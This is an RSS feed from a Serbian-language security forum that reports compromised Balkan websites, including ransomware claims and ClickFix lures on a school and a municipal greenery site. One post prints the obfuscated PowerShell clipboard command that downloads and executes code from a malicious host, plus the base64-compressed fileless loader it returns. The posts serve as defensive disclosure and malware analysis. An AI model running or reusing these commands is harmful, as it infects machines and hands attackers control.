<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[Bezbedan Balkan - Kompromitovani resursi]]></title>
		<link>https://bezbedanbalkan.net/</link>
		<description><![CDATA[Bezbedan Balkan - https://bezbedanbalkan.net]]></description>
		<pubDate>Sun, 27 Sep 2026 20:21:41 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[[HR] Ustavni sud Hrvatske - usud.hr - narušen izgled sajta [neprovereno]]]></title>
			<link>https://bezbedanbalkan.net/thread-2747.html</link>
			<pubDate>Fri, 25 Sep 2026 09:08:03 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2747.html</guid>
			<description><![CDATA[Na redditu je neko postavio da je hakovan sajt usud.hr, nema mogućnosti da se nezavisno potvrdi istinitost tvrdnje te ide kao neprovereno...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7910" target="_blank">usud2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">85.66 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">108</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7911" target="_blank">usud3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">455.11 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">106</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[Na redditu je neko postavio da je hakovan sajt usud.hr, nema mogućnosti da se nezavisno potvrdi istinitost tvrdnje te ide kao neprovereno...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7910" target="_blank">usud2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">85.66 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">108</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7911" target="_blank">usud3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">455.11 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">106</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Kompromitovan nitra.gov.rs - ostavljen "potpis"]]></title>
			<link>https://bezbedanbalkan.net/thread-2743.html</link>
			<pubDate>Tue, 22 Sep 2026 08:32:21 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2743.html</guid>
			<description><![CDATA[Grupe koje narušavaju izglede sajtova i stavljaju svoj "potpis" ponekad ne menjaju stranice na sajtu nego ostave fajl kao vid potpisa i onda pošalju link ka tom fajlu na sajtove koji objavljuju narušavanje izgleda sajta ili prate ovakve potpise. <br />
Da bi ovo postigli, često koriste propuste koji omogućavaju otpremanje proizvoljnih datoteka na server.<br />
<br />
Sajt je na infrastrukturi Kancelarije za IT i eUpravu...<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>nitra.gov.rs has address 195.222.98.253</code></div></div><br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7904" target="_blank">nit0.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">43.41 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">217</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7905" target="_blank">nit1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">17.68 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">217</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[Grupe koje narušavaju izglede sajtova i stavljaju svoj "potpis" ponekad ne menjaju stranice na sajtu nego ostave fajl kao vid potpisa i onda pošalju link ka tom fajlu na sajtove koji objavljuju narušavanje izgleda sajta ili prate ovakve potpise. <br />
Da bi ovo postigli, često koriste propuste koji omogućavaju otpremanje proizvoljnih datoteka na server.<br />
<br />
Sajt je na infrastrukturi Kancelarije za IT i eUpravu...<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>nitra.gov.rs has address 195.222.98.253</code></div></div><br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7904" target="_blank">nit0.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">43.41 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">217</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7905" target="_blank">nit1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">17.68 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">217</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[HR] HAKOM utvrdio sigurnosni incident povezan s informacijskim sustavom e-žalbe]]></title>
			<link>https://bezbedanbalkan.net/thread-2733.html</link>
			<pubDate>Mon, 14 Sep 2026 10:35:13 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2733.html</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-style: italic;" class="mycode_i">Sustav e-žalbe, koji je smješten na vanjskom poslužitelju, privremeno je nedostupan, a sve okolnosti incidenta još se utvrđuju.</span></blockquote>
<br />
<a href="https://www.hakom.hr/hr/hakom-utvrdio-sigurnosni-incident-povezan-s-informacijskim-sustavom-e-zalbe/12678" target="_blank" rel="noopener" class="mycode_url">https://www.hakom.hr/hr/hakom-utvrdio-si...albe/12678</a>]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-style: italic;" class="mycode_i">Sustav e-žalbe, koji je smješten na vanjskom poslužitelju, privremeno je nedostupan, a sve okolnosti incidenta još se utvrđuju.</span></blockquote>
<br />
<a href="https://www.hakom.hr/hr/hakom-utvrdio-sigurnosni-incident-povezan-s-informacijskim-sustavom-e-zalbe/12678" target="_blank" rel="noopener" class="mycode_url">https://www.hakom.hr/hr/hakom-utvrdio-si...albe/12678</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[BA] BHMAC - Bosnia and Herzegovina Mine Action Center - ransomware]]></title>
			<link>https://bezbedanbalkan.net/thread-2730.html</link>
			<pubDate>Fri, 11 Sep 2026 15:16:18 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2730.html</guid>
			<description><![CDATA[Ransomware ekipa "EMPERADOR" objavila je navodnu kompromitaciju ove organizacije.<br />
<br />
Nije prvi put da im se ovo dešava, 2024. se desilo slično: <a href="https://bezbedanbalkan.net/thread-1520.html" target="_blank" rel="noopener" class="mycode_url">BHMAC - Bosnia and Herzegovina Mine Action Center - ransomwareovan</a><br />
<br />
Ekipa tvrdi da poseduje 1.7GB kompresovanih podataka što i nije neki značajno veliki broj:<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7804" target="_blank">bhm2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">152.85 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">176</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Kao uzorak su postavili nekakav dokument: <br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7803" target="_blank">bhm3.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">68.3 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">173</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Sajt bhmac.org je nedostupan već nekoliko dana :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7805" target="_blank">bhm1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">21.09 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">172</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>bhmac.org has address 208.115.224.194</code></div></div>]]></description>
			<content:encoded><![CDATA[Ransomware ekipa "EMPERADOR" objavila je navodnu kompromitaciju ove organizacije.<br />
<br />
Nije prvi put da im se ovo dešava, 2024. se desilo slično: <a href="https://bezbedanbalkan.net/thread-1520.html" target="_blank" rel="noopener" class="mycode_url">BHMAC - Bosnia and Herzegovina Mine Action Center - ransomwareovan</a><br />
<br />
Ekipa tvrdi da poseduje 1.7GB kompresovanih podataka što i nije neki značajno veliki broj:<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7804" target="_blank">bhm2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">152.85 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">176</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Kao uzorak su postavili nekakav dokument: <br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7803" target="_blank">bhm3.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">68.3 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">173</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Sajt bhmac.org je nedostupan već nekoliko dana :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7805" target="_blank">bhm1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">21.09 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">172</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>bhmac.org has address 208.115.224.194</code></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Kompromitovan sajt osnovne škole - oselemir-taras.edu.rs - clickfix na sajtu]]></title>
			<link>https://bezbedanbalkan.net/thread-2729.html</link>
			<pubDate>Thu, 10 Sep 2026 08:08:37 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2729.html</guid>
			<description><![CDATA[OŠ Svetozar Marković - Toza u Elemiru<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7793" target="_blank">ose1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">568.41 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">171</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
kada se klikne...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7792" target="_blank">ose2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">224.66 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">171</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
u klipbord stavlja :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>irm (('{0}{1}' -f 'h','ttps://')+('inte'+'rnetserchinkas.co')+'/hex/lom/84aa3f59') -UserAgent 'WUA/22ab8f9767' -Headers @{('X'+'-WUA')='22ab8f9767'}|iex</code></div></div><br />
što posle čišćenja izgleda ovako :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>irm "https://internetserchinkas.co/hex/lom/84aa3f59" `
    -UserAgent "WUA/22ab8f9767" `
    -Headers @{"X-WUA"="22ab8f9767"} | iex</code></div></div><br />
Payload sa tog linka :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36;ErrorActionPreference='SilentlyContinue';&#36;ProgressPreference='SilentlyContinue';try{[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12}catch{};Add-Type -A System.IO.Compression;&#36;ew5jfhs=[convert]::('FromBase64String')(('XVTbkps4EP0VVcVZQQ1mJCFhCMtupbzZzVaS2VRlkjxQfhAgDDYGjwBf43/fZnwhk4cW'+'dOv07XRD1lVJW9QV0oe42S2yfXt8UNvxN6kLGZcKjR/kSiGcH3ZyMUlzjOCq7BQyetR/8UIlLXpQrf1dxdOyUFVrovHftU5U0Or9sciM0dXV/qzr3d48/mKwp1ql4FfIsgm'+'jPtRgmMokV7M3b/5SmezK9ifk6ZTINsmPp2AI917JVOkmwl8bpcdv5wDFsxB/qg9FWcp7YRNkfC+qtN426OERUWKTAIHB5QHaudxEb9frUkEjH4r2XjgT23GR8eH946ePFiqLpUL/qG'+'RZm2ia63ql7ilzbWK7jsdt4aEvMgPKrm7v0vnLexxEm7pIZyTIroTLbJtmB9cYFbqxRltvDtR0QoUYB1mtjdE6DkkAJxqXLepB9kdVzdu8t92F7Iy+C6Mkl3pmREldbZRuga3H+t+qddhzYPtLFzetLqp5H9BipkVdcxzvah0VVTs7O/fJo/7+npmve+WSaWYCvZDkFMAcCSTUfB9SsD3lu9Sf70O8eJLTfdLh4PdX3X7pCfXqj2CUMNebu7EbYpFyJvxJzIkg8JZQIjzmgsZ5Cne+cBnjsWA8JR73BJ8IKkFLRMypoBPR+1FKEi4giuDAYr9Uw+g76W0zKUIDH8npSE+wnRnCJIZcbIItTHkmXM5IjM1gVHVlGT6f/c5slqrzml89GRFUOODpECl8IbmgHkmYopy4ZEIYPDNGCOEpdQGacOU4fWy5XTirdXoIL0NFNxLQlazbAoyW8cqPtecP4EsfA/ZlsZN4wwbwtfYB/ZKUHZcbHzgZL+qieh5wNJsZrmdRSkF8EGJRctb9CbwSy3NAc0E4qOKCcEzobLWXTfzkhcNndklgGOfC7q4UHtnp6JyJNPCf+A4XIClIiE3rxpCFf1uG2Lq2bJrXyUTnNYX9fbdat0BBm+st10/LofNLLejGYGDcUOaPQu1Owe0v9j8='));&#36;y6b8=New-Object IO.MemoryStream -ArgumentList @(,&#36;ew5jfhs);&#36;p674g276=[IO.Compression.DeflateStream]::new(&#36;y6b8,[IO.Compression.CompressionMode]::Decompress);&#36;iu28tw=(New-Object IO.StreamReader(&#36;p674g276)).ReadToEnd();&amp;([scriptblock]::Create(&#36;iu28tw))</code></div></div><br />
<blockquote class="mycode_quote"><cite>Quote:</cite>This script is a <span style="font-weight: bold;" class="mycode_b">multi-stage PowerShell malware loader</span> that:<br />
<br />
Stage 1 (This Script)<br />
<ol type="1" class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Disables error handling</span> - hides failures<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Enables TLS 1.2</span> - for secure C2 communication<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Loads compression libraries</span> - for decompression<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Decodes Base64</span> - first layer of obfuscation<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Decompresses Deflate</span> - second layer<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Executes in memory</span> -[scriptblock]::Create() + &amp;<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">No disk writes</span> - fully fileless<br />
</li>
</ol>
Stage 2 (Decompressed Payload)<br />
<ol type="1" class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Downloads</span> from internetserchinkas[.]co/hex/lom/84aa3f59<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Uses custom headers</span> (WUA/22ab8f9767,X-WUA: 22ab8f9767)<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Executes the response</span> via iex<br />
</li>
</ol>
</blockquote>
]]></description>
			<content:encoded><![CDATA[OŠ Svetozar Marković - Toza u Elemiru<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7793" target="_blank">ose1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">568.41 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">171</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
kada se klikne...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7792" target="_blank">ose2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">224.66 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">171</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
u klipbord stavlja :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>irm (('{0}{1}' -f 'h','ttps://')+('inte'+'rnetserchinkas.co')+'/hex/lom/84aa3f59') -UserAgent 'WUA/22ab8f9767' -Headers @{('X'+'-WUA')='22ab8f9767'}|iex</code></div></div><br />
što posle čišćenja izgleda ovako :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>irm "https://internetserchinkas.co/hex/lom/84aa3f59" `
    -UserAgent "WUA/22ab8f9767" `
    -Headers @{"X-WUA"="22ab8f9767"} | iex</code></div></div><br />
Payload sa tog linka :<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>&#36;ErrorActionPreference='SilentlyContinue';&#36;ProgressPreference='SilentlyContinue';try{[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12}catch{};Add-Type -A System.IO.Compression;&#36;ew5jfhs=[convert]::('FromBase64String')(('XVTbkps4EP0VVcVZQQ1mJCFhCMtupbzZzVaS2VRlkjxQfhAgDDYGjwBf43/fZnwhk4cW'+'dOv07XRD1lVJW9QV0oe42S2yfXt8UNvxN6kLGZcKjR/kSiGcH3ZyMUlzjOCq7BQyetR/8UIlLXpQrf1dxdOyUFVrovHftU5U0Or9sciM0dXV/qzr3d48/mKwp1ql4FfIsgm'+'jPtRgmMokV7M3b/5SmezK9ifk6ZTINsmPp2AI917JVOkmwl8bpcdv5wDFsxB/qg9FWcp7YRNkfC+qtN426OERUWKTAIHB5QHaudxEb9frUkEjH4r2XjgT23GR8eH946ePFiqLpUL/qG'+'RZm2ia63ql7ilzbWK7jsdt4aEvMgPKrm7v0vnLexxEm7pIZyTIroTLbJtmB9cYFbqxRltvDtR0QoUYB1mtjdE6DkkAJxqXLepB9kdVzdu8t92F7Iy+C6Mkl3pmREldbZRuga3H+t+qddhzYPtLFzetLqp5H9BipkVdcxzvah0VVTs7O/fJo/7+npmve+WSaWYCvZDkFMAcCSTUfB9SsD3lu9Sf70O8eJLTfdLh4PdX3X7pCfXqj2CUMNebu7EbYpFyJvxJzIkg8JZQIjzmgsZ5Cne+cBnjsWA8JR73BJ8IKkFLRMypoBPR+1FKEi4giuDAYr9Uw+g76W0zKUIDH8npSE+wnRnCJIZcbIItTHkmXM5IjM1gVHVlGT6f/c5slqrzml89GRFUOODpECl8IbmgHkmYopy4ZEIYPDNGCOEpdQGacOU4fWy5XTirdXoIL0NFNxLQlazbAoyW8cqPtecP4EsfA/ZlsZN4wwbwtfYB/ZKUHZcbHzgZL+qieh5wNJsZrmdRSkF8EGJRctb9CbwSy3NAc0E4qOKCcEzobLWXTfzkhcNndklgGOfC7q4UHtnp6JyJNPCf+A4XIClIiE3rxpCFf1uG2Lq2bJrXyUTnNYX9fbdat0BBm+st10/LofNLLejGYGDcUOaPQu1Owe0v9j8='));&#36;y6b8=New-Object IO.MemoryStream -ArgumentList @(,&#36;ew5jfhs);&#36;p674g276=[IO.Compression.DeflateStream]::new(&#36;y6b8,[IO.Compression.CompressionMode]::Decompress);&#36;iu28tw=(New-Object IO.StreamReader(&#36;p674g276)).ReadToEnd();&amp;([scriptblock]::Create(&#36;iu28tw))</code></div></div><br />
<blockquote class="mycode_quote"><cite>Quote:</cite>This script is a <span style="font-weight: bold;" class="mycode_b">multi-stage PowerShell malware loader</span> that:<br />
<br />
Stage 1 (This Script)<br />
<ol type="1" class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Disables error handling</span> - hides failures<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Enables TLS 1.2</span> - for secure C2 communication<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Loads compression libraries</span> - for decompression<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Decodes Base64</span> - first layer of obfuscation<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Decompresses Deflate</span> - second layer<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Executes in memory</span> -[scriptblock]::Create() + &amp;<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">No disk writes</span> - fully fileless<br />
</li>
</ol>
Stage 2 (Decompressed Payload)<br />
<ol type="1" class="mycode_list"><li><span style="font-weight: bold;" class="mycode_b">Downloads</span> from internetserchinkas[.]co/hex/lom/84aa3f59<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Uses custom headers</span> (WUA/22ab8f9767,X-WUA: 22ab8f9767)<br />
</li>
<li><span style="font-weight: bold;" class="mycode_b">Executes the response</span> via iex<br />
</li>
</ol>
</blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Kompromitovan Gradsko zelenilo Novi Sad - zelenilo.com - clickfix na sajtu]]></title>
			<link>https://bezbedanbalkan.net/thread-2728.html</link>
			<pubDate>Wed, 09 Sep 2026 22:56:05 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2728.html</guid>
			<description><![CDATA[Ne uspevam da detoniram clickfix, izgleda da je neki deo infrastrukture nedostupan.<br />
<br />
Na sajtu na vrhu kôda postoji zamagljeni kôd :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7791" target="_blank">zel1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">420.52 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">171</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
DeepSeek ga opisuje kao:<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>2. <span style="font-weight: bold;" class="mycode_b">Core Functionality</span><br />
The decoded script performs these actions:<br />
A. <span style="font-weight: bold;" class="mycode_b">Environment Checks</span><ul class="mycode_list"><li>Checks if running on Windows platform<br />
</li>
<li>Verifies browser/user-agent<br />
</li>
<li>Looks for debugging tools<br />
</li>
</ul>
B. <span style="font-weight: bold;" class="mycode_b">Smart Contract Interaction</span><ul class="mycode_list"><li>Connects to multiple Ethereum RPC endpoints:<ul class="mycode_list"><li><a href="https://rpc.sepolia.ethpandaops.io" target="_blank" rel="noopener" class="mycode_url">https://rpc.sepolia.ethpandaops.io</a><br />
</li>
<li><a href="https://ethereum-sepolia-public.nodes.app" target="_blank" rel="noopener" class="mycode_url">https://ethereum-sepolia-public.nodes.app</a><br />
</li>
<li><a href="https://1rpc.io/sepolia" target="_blank" rel="noopener" class="mycode_url">https://1rpc.io/sepolia</a><br />
</li>
<li><a href="https://gateway.tenderly.co/public/sepolia" target="_blank" rel="noopener" class="mycode_url">https://gateway.tenderly.co/public/sepolia</a><br />
</li>
<li><a href="https://sepolia.gateway.tenderly.co" target="_blank" rel="noopener" class="mycode_url">https://sepolia.gateway.tenderly.co</a><br />
</li>
</ul>
</li>
</ul>
C. <span style="font-weight: bold;" class="mycode_b">Payload Retrieval</span><ul class="mycode_list"><li>Calls a smart contract at address <br />
0x0321C73150543FAa9D016c9c46Abf293Eb6839e4<br />
</li>
<li>Uses <br />
eth_call<br />
to fetch data<br />
</li>
<li>Decrypts the response using AES-GCM<br />
</li>
</ul>
D. <span style="font-weight: bold;" class="mycode_b">Payload Execution</span><ul class="mycode_list"><li>Decrypts the retrieved data<br />
</li>
<li>Stores it in <br />
localStorage<br />
with a cache key<br />
</li>
<li>Executes the decrypted code via <br />
new Function()<br />
</li>
</ul>
</blockquote>
<br />
I zaista učitava sa blokčejna odakle dobija enkriptovan tekst :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7790" target="_blank">zel2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">351.64 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">166</span></span>
</div>
